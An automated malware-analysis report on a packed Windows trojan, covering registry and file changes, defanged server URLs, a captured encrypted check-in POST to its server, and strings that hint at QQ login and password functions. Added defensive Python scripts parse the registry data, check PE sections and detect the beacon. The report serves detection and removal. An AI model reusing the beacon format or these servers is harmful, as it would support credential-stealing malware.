Gen:Variant.Symmi.57379 (B) (Emsisoft), Gen:Variant.Symmi.57379 (AdAware), Trojan.Win32.FlyStudio.FD, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 9a61377f7a267d0733acc68f3f3072cf
SHA1: 5e54992e3afc40333f0ddcf340790d48ad7e349f
SHA256: a4c9fcaad48bb22de6acd412eea7136e979c1c6617836f620fc62dbe2f26e20c
SSDeep: 49152:nGHQYGTwg AM HhgGibN4O9M3uLGgDekt3q wtw9JbtYDvPd3TR47jna/gRkVNOK:Gwt8wM HMvDH xl47za/D4GYEpuSh2e
Size: 4464640 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-05-03 21:14:58
Analyzed on: Windows7 SP1 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
regsvr32.exe:1780
The Trojan injects its code into the following process(es):
%original file name%.exe:2956
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process regsvr32.exe:1780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ZCB_API.DLL (49 bytes)
The process %original file name%.exe:2956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\ZCB_API.DLL (1 bytes)
Registry activity
The process regsvr32.exe:1780 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\TypeLib]
"(Default)" = "{D7111ECF-2415-46C6-AAD4-EE6802448456}"
[HKCR\Interface\{A5CF4797-7A19-403B-908C-E9F1CE93135E}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\ProgID]
"(Default)" = "REGCOM.Register.Api.1"
[HKCR\TypeLib\{D7111ECF-2415-46C6-AAD4-EE6802448456}\1.0\0\win32]
"(Default)" = "c:\ZCB_API.DLL"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}]
"(Default)" = "ZCBApiPlug Class"
[HKCR\Interface\{A5CF4797-7A19-403B-908C-E9F1CE93135E}\TypeLib]
"(Default)" = "{D7111ECF-2415-46C6-AAD4-EE6802448456}"
[HKCR\TypeLib\{D7111ECF-2415-46C6-AAD4-EE6802448456}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{A5CF4797-7A19-403B-908C-E9F1CE93135E}\TypeLib]
"Version" = "1.0"
[HKCR\REGCOM.Register.Api\CurVer]
"(Default)" = "REGCOM.Register.Api.1"
[HKCR\TypeLib\{D7111ECF-2415-46C6-AAD4-EE6802448456}\1.0]
"(Default)" = "ZCB_APILib"
[HKCR\REGCOM.Register.Api.1\CLSID]
"(Default)" = "{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\VersionIndependentProgID]
"(Default)" = "REGCOM.Register.Api"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\InprocServer32]
"(Default)" = "c:\ZCB_API.DLL"
[HKCR\REGCOM.Register.Api.1]
"(Default)" = "ZCBApiPlug Class"
[HKCR\Interface\{A5CF4797-7A19-403B-908C-E9F1CE93135E}]
"(Default)" = "IZCBApiPlug"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{A5CF4797-7A19-403B-908C-E9F1CE93135E}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\REGCOM.Register.Api]
"(Default)" = "ZCBApiPlug Class"
[HKCR\TypeLib\{D7111ECF-2415-46C6-AAD4-EE6802448456}\1.0\HELPDIR]
"(Default)" = "c:"
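The block of HKCR keys above is what regsvr32.exe writes when it loads a DLL and calls its DllRegisterServer export: a CLSID whose InprocServer32 points at the DLL, a ProgID and version-independent ProgID that resolve to that CLSID, an Interface entry marshalled by the universal proxy/stub, and a TypeLib whose win32 path names the same file. The script below is an added example, not part of the Lavasoft report; it parses a subset of the listing above (copied verbatim) back into that structure and applies two triage heuristics of its own: a COM server DLL sitting in the drive root, or anywhere outside the Windows and Program Files trees, deserves a second look, and the TypeLib path should agree with the InprocServer32 path.

```python
import re

# Entries copied from the regsvr32.exe:1780 registry activity above. This is a
# subset of that listing; the full listing parses the same way.
REGSVR32_ENTRIES = r"""
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\TypeLib]
"(Default)" = "{D7111ECF-2415-46C6-AAD4-EE6802448456}"
[HKCR\Interface\{A5CF4797-7A19-403B-908C-E9F1CE93135E}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\ProgID]
"(Default)" = "REGCOM.Register.Api.1"
[HKCR\TypeLib\{D7111ECF-2415-46C6-AAD4-EE6802448456}\1.0\0\win32]
"(Default)" = "c:\ZCB_API.DLL"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}]
"(Default)" = "ZCBApiPlug Class"
[HKCR\REGCOM.Register.Api.1\CLSID]
"(Default)" = "{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\InprocServer32]
"(Default)" = "c:\ZCB_API.DLL"
[HKCR\Interface\{A5CF4797-7A19-403B-908C-E9F1CE93135E}]
"(Default)" = "IZCBApiPlug"
[HKCR\CLSID\{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}\InprocServer32]
"ThreadingModel" = "Apartment"
"""

KEY_RE = re.compile(r"^\[(.+)\]$")
VALUE_RE = re.compile(r'^"([^"]+)"\s*=\s*"(.*)"$')
GUID_RE = re.compile(r"\{[0-9a-f-]{36}\}")


def parse_reg_listing(text):
    """Turn [key] / "name" = "value" lines into {key: {name: value}}.
    Keys are lower-cased because the registry is case-insensitive."""
    tree, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1).lower()
            tree.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            tree[current][m.group(1)] = m.group(2)
    return tree


def com_servers(tree):
    """Every CLSID with an InprocServer32, joined to its name, ProgID, threading
    model, TypeLib id and the win32 path(s) registered for that TypeLib."""
    servers = {}
    for key, values in tree.items():
        if not (key.startswith("hkcr\\clsid\\") and key.endswith("\\inprocserver32")):
            continue
        clsid = GUID_RE.search(key).group(0)
        base = "hkcr\\clsid\\" + clsid
        typelib = tree.get(base + "\\typelib", {}).get("(Default)", "").lower()
        tl_paths = [v.get("(Default)", "") for k, v in tree.items()
                    if typelib and k.startswith("hkcr\\typelib\\" + typelib)
                    and k.endswith("\\win32")]
        servers[clsid.upper()] = {
            "name": tree.get(base, {}).get("(Default)", ""),
            "server": values.get("(Default)", ""),
            "threading": values.get("ThreadingModel", ""),
            "progid": tree.get(base + "\\progid", {}).get("(Default)", ""),
            "typelib": typelib.upper(),
            "typelib_paths": tl_paths,
        }
    return servers


# Heuristic directory allow-list; an assumption of this example, not the report's.
TRUSTED_DIRS = ("\\windows\\", "\\program files")


def triage(entry):
    """Flags a practitioner would want: DLL in the drive root, DLL outside the
    usual system trees, TypeLib path disagreeing with the InprocServer32 path."""
    path = entry["server"].lower()
    return {
        "drive_root": re.fullmatch(r"[a-z]:\\[^\\]+", path) is not None,
        "outside_trusted_dirs": not any(d in path for d in TRUSTED_DIRS),
        "typelib_points_elsewhere": any(p.lower() != path for p in entry["typelib_paths"]),
    }


if __name__ == "__main__":
    for clsid, entry in com_servers(parse_reg_listing(REGSVR32_ENTRIES)).items():
        print(clsid, entry["progid"], entry["server"], triage(entry))
```

The same parser works on a `reg export HKCR` dump from a live host, which is the practical use: list every InprocServer32 and look at the ones `triage` flags. regsvr32.exe itself is a signed Windows binary, so the DLL path and the registration it leaves behind are the artefacts to hunt for, not the process name.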
The process %original file name%.exe:2956 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry (the HKLM\SOFTWARE\Microsoft\Tracing\<executable name>_RASAPI32 and _RASMANCS keys and the Internet Settings\ZoneMap values are written by the Windows RAS and WinINet components the first time a process uses them, so they show that the sample made network calls rather than a deliberate configuration change by the Trojan):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\9a61377f7a267d0733acc68f3f3072cf_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\9a61377f7a267d0733acc68f3f3072cf_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3C 00 00 00 09 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Tracing\9a61377f7a267d0733acc68f3f3072cf_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\9a61377f7a267d0733acc68f3f3072cf_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\9a61377f7a267d0733acc68f3f3072cf_RASMANCS]
"EnableFileTracing" = "0"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"
Dropped PE files
MD5 | File path |
---|---|
7925a1237adddf061c1ec4f9c0328597 | c:\ZCB_API.DLL |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
regsvr32.exe:1780 (the process ID is from the analysis run; on an infected host look for the regsvr32.exe instance that loaded C:\ZCB_API.DLL)
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\ZCB_API.DLL (49 bytes)
- Remove the COM registration that regsvr32.exe created for C:\ZCB_API.DLL (the HKCR\CLSID, HKCR\Interface, HKCR\TypeLib and HKCR\REGCOM.Register.Api* keys listed under Registry activity).
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: ??
Product Name: ????
Product Version: 1.0.0.0
Legal Copyright: ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ????
Comments: ????
Language: Spanish (Spain, International Sort)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 999258 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 1003520 | 3745736 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.data | 4751360 | 390730 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 5144576 | 85500 | 73728 | 1.14454 | 753f0c704956f034c5f6437deb7c865e |
.vmp0 | 5230592 | 115152 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp1 | 5349376 | 4381495 | 4382720 | 5.44642 | dcca07c29627637961a1f0efd028fbab |
.reloc | 9732096 | 52 | 4096 | 0.072668 | 3f22af9f5bc29be1d803560f5fb2037c |
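Four of the seven sections have a raw size of 0, and their Section MD5 is d41d8cd98f00b204e9800998ecf8427e, the MD5 of empty input; the hash says nothing about the code that ends up there at run time. The .vmp0/.vmp1 names are the section names VMProtect uses, which is consistent with the "Packed" entropy verdict. The script below is an added example, not part of the report: it parses the table above as given, applies those two observations as checks, and accounts for the file size against the raw sections. The 4096 bytes left over are consistent with a 0x1000-byte header block and therefore no appended overlay; that reading of the leftover is an inference of this example, since the report does not state the header size.

```python
import hashlib

# Rows copied from the PE Sections table above:
# Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5
SECTION_TABLE = """
.text | 4096 | 999258 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 1003520 | 3745736 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.data | 4751360 | 390730 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 5144576 | 85500 | 73728 | 1.14454 | 753f0c704956f034c5f6437deb7c865e |
.vmp0 | 5230592 | 115152 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp1 | 5349376 | 4381495 | 4382720 | 5.44642 | dcca07c29627637961a1f0efd028fbab |
.reloc | 9732096 | 52 | 4096 | 0.072668 | 3f22af9f5bc29be1d803560f5fb2037c |
"""
FILE_SIZE = 4464640  # "Size" from the Summary above

# MD5 of zero bytes; equal to the hash the report shows for the empty sections.
EMPTY_MD5 = hashlib.md5(b"").hexdigest()


def parse_sections(table):
    """Parse the pipe-separated rows into dicts with numeric fields."""
    rows = []
    for line in table.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        name, va, vsize, rsize, entropy, md5 = cells
        rows.append({"name": name, "va": int(va), "vsize": int(vsize),
                     "rsize": int(rsize), "entropy": float(entropy),
                     "md5": md5.lower()})
    return rows


def assess(rows):
    """Per-section triage notes."""
    notes = {}
    for r in rows:
        n = []
        if r["rsize"] == 0 and r["vsize"] > 0:
            n.append("no on-disk bytes; filled at run time by the unpacking stub")
            if r["md5"] == EMPTY_MD5:
                n.append("MD5 is the empty-input hash, so it identifies nothing")
        if r["name"].startswith(".vmp"):
            n.append("section name used by VMProtect")
        notes[r["name"]] = n
    return notes


def unaccounted_bytes(rows, file_size):
    """File bytes not covered by any section's raw data. The headers occupy the
    first block of the file; anything beyond that would be an overlay appended
    after the last section, a common place for packers to keep a payload."""
    return file_size - sum(r["rsize"] for r in rows)


def runtime_footprint(rows):
    """Virtual bytes reserved for sections that have no raw data: how much the
    stub has to materialise before the real program can run."""
    return sum(r["vsize"] for r in rows if r["rsize"] == 0)


if __name__ == "__main__":
    rows = parse_sections(SECTION_TABLE)
    for name, notes in assess(rows).items():
        print(name, notes)
    print("unaccounted bytes:", unaccounted_bytes(rows, FILE_SIZE))
    print("run-time footprint:", runtime_footprint(rows))
```

Read the two totals together: roughly 5.0 MB of code and data exist only after the stub has run, while the 4.4 MB .vmp1 section holds the protected form, so static signatures over .text of this file are pointless and the dumped-process strings further down are the better source of indicators.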
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://jdyou_152.proxy.kaopuyun.net/Open/V1_4/Soft/Upgrade | |
hxxp://c.84zcb.com/Open/V1_4/Soft/Upgrade | 125.77.22.178 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
POST /Open/V1_4/Soft/Upgrade HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible)
Host: c.84zcb.com
Content-Length: 363
Cache-Control: no-cache
data=ZU/VMNyNxS1TnWRRj8GxQjWrbubxbK0I3z4lBE3kH1Lg0zx7Bm8NCL6F1dhzPiI3pLtLGO3rCd5V2DtXaBJo5sQ6HXo6eUWWiW cegStVRiwjeUVmrzou8S4yae3VVvMiUu3yRbPIdm1Ku8RJziEez//9TTQ5zmKRmAQQgmBI8iszeFbtvy4qONM0LFZeinZJbQVvlnxqWvlgwJYnCm/N6Mr3CVSYek/6osDNktRBY89J8tH7/VZBVvfiXpVcKfg5u JZAowUxbhQkiEuHHkjrmK5o/1Iw6ZVwBN8X0r1cBiBaWdZU/VMHEdcEWdhtEF&sign=9C296E0C2193E917A57032C94E3E6593
HTTP/1.1 200 OK
Date: Wed, 07 Dec 2016 22:25:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 728
Connection: keep-alive
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 4.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: no-cache
pmFeIO9K3DilnoBmWvXyvfWSsM8ondhCagHPiKq3tzTSPR2dpWuZt3QAv3xy5QaD/p/saU4FM/nw8fIj0NVbcHHoZCA 5udmJ2SGitbb X5iiUpsjgcPXlASfhFZspBi5ZijI3RujBRhfho3u6DP7F xhWh bYpWf2VPSTS8Yk8ZHtRH9vb8OG5N4B osfVMrnJRBdXJrJkqb1d//fNtodbm6Fujpth0JpuF1lzvGytVKRBDtaBvhQHGVmI2uDP4YlO BRvxfYWDr47imgN1Vuq/74SuMNnB6CsXdQ3qGxIyhyKB4NBKDhho8SqgC3jHO/MJ9bZ9W8ZkcTFOTYiiOZhEQJJe1mp5z3Q4sC2qiPqBDVEI1Z/aU61FZHHAjcCEmuPMy 1BDcNZPSzmAbYOg7Ux9i3F dBgFW8v2L7kbrFyvtpLnVCVUhf1RiJDXjnpubue4eYV6uvWHtG2jXazhrrNuvyMf8FbEniFM20cmwpdo3aUJd/tEcVYwd1mQ6HV8WQAM3tsCyF1TdrwXTcjeU65vLzByfGMnf2m3PiJmvJrdtLx2OJ/Kllf2mzd03zJP6dG1yHpMzg0ewdx6MK6h4Pu3gySTPNpiBhV0MMMKhB5xnz4h0fH/jW1GdfmdCsuqleWAzMYH5bw1YU8pm4o8ZFKg3zuYPJm3B/LANr4wK30hARWS/QOUq3bLXoAL24TQto8H6ZhXiAoip7rXVJYiw==
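The exchange above is a check-in to an "Upgrade" endpoint: a POST whose body is exactly two form fields, an opaque base64 `data` blob and a 32-hex-digit `sign`, sent with the bare User-Agent "Mozilla/4.0 (compatible)", answered by an opaque base64 blob. The report gives no IDS verdict, so the script below is an added example of the detection logic a practitioner would write from these observations; it is not the report's or Lavasoft's. The path, hosts and User-Agent are taken from the capture; the scoring (path or host plus the data/sign body shape) is this example's own. Both requests it runs over are constructed: the first mirrors the captured beacon with a shortened `data` value, the second is an ordinary made-up browser request. The signing algorithm behind `sign` is not known from the page and is not guessed here.

```python
import re

# Indicators taken from the captured request and the URLs table above.
BEACON_PATH = "/Open/V1_4/Soft/Upgrade"
BEACON_HOSTS = {"c.84zcb.com", "jdyou_152.proxy.kaopuyun.net"}
BEACON_UA = "Mozilla/4.0 (compatible)"
SIGN_RE = re.compile(r"^[0-9A-Fa-f]{32}$")   # 32 hex digits, algorithm unknown
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def build_request(method, path, host, ua, body=""):
    """Assemble a raw HTTP/1.1 request; used only to build the samples below."""
    lines = [f"{method} {path} HTTP/1.1", "Accept: */*", f"Host: {host}", f"User-Agent: {ua}"]
    if body:
        lines += ["Content-Type: application/x-www-form-urlencoded",
                  f"Content-Length: {len(body)}"]
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Constructed samples (not captured traffic).
SAMPLE_BEACON = build_request(
    "POST", BEACON_PATH, "c.84zcb.com", BEACON_UA,
    "data=ZU/VMNyNxS1TnWRRj8GxQjWrbubxbK0I3z4lBE3kH1Lg0zx7Bm8NCL6F1dhzPiI3"
    "&sign=9C296E0C2193E917A57032C94E3E6593")
SAMPLE_BENIGN = build_request(
    "GET", "/index.html", "www.example.com",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/115.0")


def parse_request(raw):
    """Split a raw request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _ = request_line.split(" ", 2)
    headers = {}
    for h in header_lines:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def body_fields(body):
    """Split x-www-form-urlencoded pairs without percent-decoding, so a '+'
    inside the base64 blob is not turned into a space."""
    fields = {}
    for pair in body.split("&"):
        if pair:
            k, _, v = pair.partition("=")
            fields[k] = v
    return fields


def classify(req):
    """Return the matched indicators and a verdict. Path and host are strong
    indicators; the generic UA and the body shape are weak on their own."""
    hits = []
    if req["method"] == "POST" and req["path"] == BEACON_PATH:
        hits.append("known_path")
    if req["headers"].get("host", "").lower() in BEACON_HOSTS:
        hits.append("known_host")
    if req["headers"].get("user-agent") == BEACON_UA:
        hits.append("generic_ua")
    f = body_fields(req["body"])
    if set(f) == {"data", "sign"} and SIGN_RE.match(f["sign"]) and B64_RE.match(f["data"]):
        hits.append("data_sign_body")
    strong = {"known_path", "known_host"} & set(hits)
    if strong and "data_sign_body" in hits:
        verdict = "beacon"
    elif hits:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": hits}


if __name__ == "__main__":
    for sample in (SAMPLE_BEACON, SAMPLE_BENIGN):
        print(classify(parse_request(sample)))
```

The host list is the weakest indicator over time (the first URL already goes through a proxy hostname), so the path and the `data`/`sign` body shape are what to carry into a proxy-log query or an IDS rule; the "Mozilla/4.0 (compatible)" User-Agent alone will match far too much legitimate software.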
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_2956:
.text
`.rdata
@.data
.rsrc
@.vmp0
`.vmp1
.reloc
t$(SSh
~%UVW
u$SShe
Bv.SCv=kAv
gdiplus.dll
GdiPlus.dll
user32.dll
kernel32.dll
Kernel32.dll
advapi32.dll
Ole32.dll
gdi32.dll
ole32.dll
Gdi32.dll
msimg32.dll
User32.dll
Gdiplus.dll
UxTheme.dll
GetKeyState
GdipSetStringFormatHotkeyPrefix
UnloadKeyboardLayout
GetKeyboardLayoutList
GetKeyboardLayout
ActivateKeyboardLayout
GetKeyboardLayoutNameA
RegOpenKeyA
RegDeleteKeyA
RegCloseKey
RegCreateKeyA
RegFlushKey
LoadKeyboardLayoutA
UnregisterHotKey
RegisterHotKey
{E5000198-4471-40e2-92BC-D0BA075BDBB2}
10/05/12
\.YVV
Ã[H
L
z>REGCOM.Register.api.1
.UPX0
.UPX1
@.rsrc
GDI32.dll
%c,UJ
SHELL32.dll
IPHLPAPI.DLL
COMDLG32.dll
USER32.dll
%.Dyy
>#>0>=>~>
: ;%;3;8;\;
?!?%?)?-?1?
5#5'5 5/53575
3 3$3(3,3034383
9 9$9(9,90949895 5$5(5,505667[7~7 86282`3@4}4ZCB_API.dllY3%f{!.Ke%SchXa.ZktG6C.Ceu}J1.RvV.av^SvCL.HC*VsqLd%sKC%%CI7'~V%y.gUeA3F|EJc%XaN%xu'&*"8{@>['?.Wo].Mjq@1.cKyr-W`AnV.XC^r.wp8%x]5.koDIgf%UT%Gr%DlCÂ1=5}%sp7.FX-.ZkE6C.gm,.DFnoyP/.Wllr.SB%Ub).nhbwMSG.oVMOG.zzg%S Khn.RPX]g#M.yVE.IaUC.yx4mo.lS=F)h>X.NM9pn.FPH3.Ye>.ynD&.nTTVG#3.wiEP8j%CZd.Jn.Te>9.kWkd`.Cc|O.xmOZh.YW&F.paglD&.MY]Hpu%UGq.zE-q}?!.KUh|@q%c*v$2.ZM..SK1Y}.Mc%0s./2.fx4sms0%c0.Td'.nK2.HJ\;a%D-l.eos08H.Mf^1.uprVa|Cq%uIA0Q!.Re%.pYh:\Fq.OW`p`*.Dhe.mh"~I.bfÖo5L.De;>{X%F&$Z.b8H.ZB~@>P iXB%sJ2%Cu"~RUrlt c=@|G.ZTw;%x5.q.rgXj`(W.WVvmX.Iz7H.OD=K.yyoledlg.dllKERNEL32.dllHttpOpenRequestAOLEACC.dllWININET.dllVERSION.dllVJ.wA EShellExecuteWSHLWAPI.dllOLEAUT32.dlle*%C$2S".avWINSPOOL.DRV.QCRzwH%C^,,.iImuRLW8405.Do#-Z}Vmv.MK]MiA.cD%7u3mjW%x=uLsaIc\.pAO4Ll%SiS.Ac[F.qg.oodJ'.KrTI%s=!d.Hz).mp{v.jc&k?.ee?!ADVAPI32.dll*a.DMj%FK.dnREGCOM.Register.Api.1 = s 'ZCBApiPlug Class'CLSID = s '{9CF66319-AA2F-424A-BEEA-9E42E36BEA1A}'REGCOM.Register.Api = s 'ZCBApiPlug Class'CurVer = s 'REGCOM.Register.Api.1'ForceRemove {9CF66319-AA2F-424A-BEEA-9E42E36BEA1A} = s 'ZCBApiPlug Class'ProgID = s 'REGCOM.Register.Api.1'VersionIndependentProgID = s 'REGCOM.Register.Api'TypeLib = s '{D7111ECF-2415-46C6-AAD4-EE6802448456}'stdole2.tlbWWWAPI_LoginWWW,7API_FindPassworddAPI_LoginOutdAPI_QQLoginWCreated by MIDL version 7.00.0555 at Fri Mar 13 14:58:24 2015Adobe Photoshop CS4 Windows2012:08:09 14:06:56urlTEXTMsgeTEXThXXp://ns.adobe.com/xap/1.0/" id="W5M0MpCehiHzreSzNTczkc9d"?>
%dYJH'
le~.leU
S%SKz
>{%UQ
,%f.F
F.ijA
}%UT0B
M%D(a
%.bx&
{O1%D
zuI{ %U
lO.mUY
d%u%4SIow=%dos~Iw%ftj.zQi?.sG4]Zu.rz;U&S%xg!ECE_[ò$"D)DeXETN.WR5f.jy=n.Te%SY>Vo&<.nzq>z:\DRM7-x}W^\}.Ordz.Nh=ix-x}WG.WxK'.IDATx%cri\:O .ZlhXXp://f.hiphotos.baidu.com/album/s=740;q=90/sign=69bde5a33a292df593c3ae118c0a2d5d/4bed2e738bd4b31c7a52b43787d6277f9f2ff8d4.jpghXXp://b.hiphotos.baidu.com/album/s=740;q=90/sign=be24b17e7d1ed21b7dc92ce19d55acf9/eaf81a4c510fd9f9ee9a75e5252dd42a2934a4a8.jpghXXp://f.hiphotos.baidu.com/album/s=740;q=90/sign=f34523c6dab44aed5d4ebce08327f63c/8435e5dde71190ef039bb253ce1b9d16fcfa60dd.jpghXXp://f.hiphotos.baidu.com/album/s=740;q=90/sign=5fa5abb56b63f624185d3b07b77f9ac5/71cf3bc79f3df8dc7cbaaf1dcd11728b461028b2.jpghXXp://e.hiphotos.baidu.com/album/s=740;q=90/sign=94c20c64bc3eb13540c7b5bf9625d9ee/f3d3572c11dfa9ec9edb769b62d0f703908fc140.jpghXXp://f.hiphotos.baidu.com/album/s=740;q=90/sign=dc4d926a277f9e2f74351f0c2f0b9819/fcfaaf51f3deb48ff1928152f01f3a292cf57846.jpghXXp://e.hiphotos.baidu.com/album/s=740;q=90/sign=c80984f9d688d43ff4a993f64d25a326/f7246b600c338744dff20cf0510fd9f9d72aa002.jpghXXp://h.hiphotos.baidu.com/album/s=740;q=90/sign=d2fbf6429925bc312f5d039c6ee4fc8c/b21c8701a18b87d6d8718893070828381f30fd0f.jpg9g.gq;P.pS''#g Wv.NxyJ/TU9^)%d\Config.ini@qq.comexplorer.exeDFO.exeAPI_LoginOut\Qsdfdg.ime\Qsdfdg.dllNeopleLauncher.exe`.vmp2..jf.IMM32.dllh.ekc-&M.mhGetCPInfoImeProcessKeyimehost.dllVP%f#lEEnumThreadWindowsOffsetViewportOrgExSetViewportOrgExCreateDialogIndirectParamA233.dllWINMM.dllShellExecuteAiCrTt!u!"MSIMG32.dllcomdlg32.dllRegCreateKeyExAUnhookWindowsHookExGetViewportExtExlfY%D.Qlf%)2%2,222%soGdj4%F$I202?262>RegOpenKeyExASetWindowsHookExACOMCTL32.dllGetProcessHeapWS2_32.dll."8fTP:%cs/4{/BNË[@5ML.wCr5L}.PA9.kF;O43o.hA/%x 4p%[%u&:.Cfpf%sRs{b<.bx>'%ud@$lV.Tu$;CZx#.LUZ`'.yl.ru?~\J.RC]'.krC.Rk!]5 >82z%cnu&T@.Qc-j{gr%S.CNC_%xEhl#g!Ü%cOl^-8}#yGetViewportOrgEx*a%f&Cs-,.eHI`y.4A.zf}TGh?%f#q.fx}81&YH.Zg5bJY.Zl%$CP{Zx%d%MUF%x3|5$%sXN%x.(17be}%D/4%c@El"D3J9%xiÔ3A>3#{$'5,Ej}%C2$-K}-=,%cu%f?/&%U3;.Y 
